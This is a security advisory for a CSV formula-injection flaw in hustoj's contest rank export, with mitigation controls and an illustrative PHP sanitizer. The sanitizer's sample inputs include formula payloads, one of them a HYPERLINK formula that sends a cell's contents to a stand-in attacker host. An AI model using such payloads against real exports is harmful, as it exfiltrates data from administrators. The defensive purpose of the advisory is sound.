CVE-2026-23873
Published: 22 January 2026
Summary
CVE-2026-23873 is a critical-severity Improper Neutralization of Formula Elements in a CSV File (CWE-1236) vulnerability in hustoj (zhblue/hustoj). Its CVSS v3.1 base score is 9.0 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Malicious File (T1204.002). The vulnerability has an exploit-likelihood percentile of 7.1 (well below the median), is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-15 (Information Output Filtering): requires filtering and sanitization of every value written to the exported .xls file, so that an unsanitized nickname cannot carry an Excel formula that is evaluated when the administrator opens the export.
- SI-10 (Information Input Validation): mandates validation of user-supplied input such as the Nickname field, so that formula-injection payloads are rejected or neutralized before they are stored or processed.
- Allowlisted input classes: restricts the Nickname field to an allowlist of characters, so a stored value can never begin with a formula trigger (=, +, -, @, tab or carriage return).
MITRE ATT&CK Enterprise Techniques
Why these techniques?
A formula injected into the exported .xls is evaluated when the administrator opens the file in Excel, so the administrator unwittingly executes attacker-controlled content (T1204.002 Malicious File); depending on the payload this gives the attacker code execution on the administrator's workstation.
NVD Description
hustoj is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. All versions are vulnerable to CSV Injection (Formula Injection) through the contest rank export functionality (contestrank.xls.php and admin/ranklist_export.php). The application fails to sanitize user-supplied input (specifically the "Nickname" field) before exporting it to an .xls file (which renders as an HTML table but is opened by Excel). If a malicious user sets their nickname to an Excel formula when an administrator exports and opens the rank list in Microsoft Excel, the formula will be executed. This can lead to arbitrary command execution (RCE) on the administrator's machine or data exfiltration. A fix was not available at the time of publication.
Deeper analysis
CVE-2026-23873 is a CSV Injection (Formula Injection) vulnerability affecting all versions of hustoj, an open-source online judge based on PHP, C++, MySQL and Linux that is used for ACM/ICPC and NOIP training. The issue resides in the contest rank export functionality, specifically the contestrank.xls.php and admin/ranklist_export.php scripts. Both write the user-supplied "Nickname" field into the exported .xls file without sanitization. The file is actually an HTML table, but it is opened by Microsoft Excel, which treats a cell whose text begins with a formula character as a formula and evaluates it.
A low-privileged user (PR:L in the vector), such as a registered contestant, exploits this by setting their nickname to an Excel formula. When an administrator exports the contest rank list and opens it in Excel (the UI:R component), the formula runs inside Excel under the administrator's account. Depending on the payload this yields arbitrary command execution on the administrator's machine or exfiltration of spreadsheet contents to an attacker-controlled host; the scope change (S:C) reflects that the impact lands on the administrator's workstation rather than on the judge server. The CVSS v3.1 vector is AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H (9.0, Critical), and the weakness is classified as CWE-1236. Note that Excel prompts before launching another application through DDE and before updating external links, so exploitation generally depends on the administrator clicking through a warning.
The GitHub security advisory at https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw details the vulnerability and notes that no fix was available at the time of publication on 2026-01-22. Until a patch ships, practitioners should watch the advisory for a fix, restrict who can run the rank export, sanitize nicknames server-side (at registration and again at export time), and tell administrators not to open exports in Excel, or to open them only in a viewer that does not evaluate formulas. A quick check on an existing deployment is to inspect the exported file for cells whose text begins with =, +, -, @, a tab or a carriage return.
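The two server-side controls listed under Mitigating Controls, output filtering at export time and allowlist validation at nickname-registration time, look like the following in PHP (hustoj's language). This is an added example for this page, not hustoj's own code and not the fix the project may ship; the function names, the nickname allowlist, the `<td>` layout of the export and the sample nicknames are all assumptions made for illustration.

```php
<?php
// Added example, not hustoj's code: output filtering (SI-15) at export time
// and input validation (SI-10) at nickname-registration time for CWE-1236.
// Function names, the allowlist and the <td> layout are assumptions.

/** Leading characters that make Excel treat a cell as a formula. */
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

/**
 * Output-side control: make a value inert for spreadsheet consumers.
 * Leading whitespace is skipped for the check so "  =cmd|..." is still
 * caught; a matching value is prefixed with an apostrophe, which Excel
 * displays as literal text instead of evaluating.
 */
function neutralize_formula(string $value): string
{
    $lead = ltrim($value, " \t\r\n\0\x0B");
    if ($lead !== '' && in_array($lead[0], FORMULA_TRIGGERS, true)) {
        return "'" . $value;
    }
    return $value;
}

/** The vulnerable pattern: the nickname goes straight into the HTML-table .xls. */
function export_cell_vulnerable(string $value): string
{
    return '<td>' . $value . '</td>';
}

/**
 * The hardened pattern: neutralise the formula trigger, then HTML-escape,
 * because the .xls is really an HTML table.
 */
function export_cell(string $value): string
{
    $safe = htmlspecialchars(neutralize_formula($value), ENT_QUOTES, 'UTF-8');
    return '<td>' . $safe . '</td>';
}

/**
 * Input-side control: accept only letters, digits, space, underscore and
 * dot (an assumed policy), 1 to 20 characters. None of the formula
 * triggers is in the class, so a stored nickname can never start with one.
 */
function nickname_is_valid(string $nick): bool
{
    return preg_match('/^[\p{L}\p{N} _.]{1,20}$/u', $nick) === 1;
}

// Constructed sample nicknames: one benign, three formula-injection payloads.
$samples = [
    'alice',
    '=HYPERLINK("http://attacker.example/?d="&A1,"rank")',
    "\t=1+1",
    '@SUM(1+1)',
];

foreach ($samples as $nick) {
    printf("input     : %s\n", json_encode($nick));
    printf("vulnerable: %s\n", export_cell_vulnerable($nick));
    printf("hardened  : %s\n", export_cell($nick));
    printf("accepted at registration: %s\n\n", nickname_is_valid($nick) ? 'yes' : 'no');
}
```

Run it with `php example.php`. The apostrophe prefix is visible in the exported cell, which is why the allowlist at registration is the cleaner of the two controls; keep the export-time filter anyway, since nicknames stored before the allowlist was introduced are still in the database. LibreOffice Calc honours the same trigger characters, so the filter covers administrators who open the export there too.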
Details
- CWE(s)